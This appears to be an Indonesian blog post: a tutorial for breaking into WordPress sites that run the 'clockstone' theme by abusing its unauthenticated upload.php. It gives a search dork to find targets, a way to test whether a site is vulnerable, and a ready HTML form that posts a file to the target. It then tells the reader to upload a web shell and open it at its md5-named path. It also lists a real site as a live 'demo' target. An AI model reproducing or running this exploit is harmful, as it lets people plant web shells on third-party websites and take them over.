Langsung aja..
Dork: "wp-content/themes/clockstone"
Pertama, ente harus siapin website yang udah ketanem backdoor.
Kedua, cari target yang vulnerable. Untuk mengecek website itu vulnerable atau tidak cek http://localhost/[path]/wp-content/themes/clockstone/theme/functions/upload.php . Kalau terdapat pesan error, kemungkinan website itu vulnerable.
Ketiga, kalau sudah ketemu target, upload script .php ke dalam website yang udah ditanem backdoor. Ini scriptnya:
Shell upload attack by JackVandalism a.k.a iARS_14:<br />
<form enctype="multipart/form-data" action="http://www.TARGET.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
<input type="text" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="Upload" />
</form>
(Ganti http://www.TARGET.COM/ dengan url target ente.)
Setelah itu, akses file .php yang udah diupload ke website yang ada backdoornya.
Kemudian, upload deh shell atau yang lainnya..
Kalau shell udah terupload, setelah itu akan ditunjukkan nama file dengan hash md5.
Selanjutnya, langsung deh masuk ke shellnya. Direktorinya: http://localhost.com/wp-content/themes/clockstone/theme/functions/shellmd5.php
Demo Site: http://jumptoitinc.net/wp-content/themes/clockstone/theme/functions/upload.php
0 komentar:
Post a Comment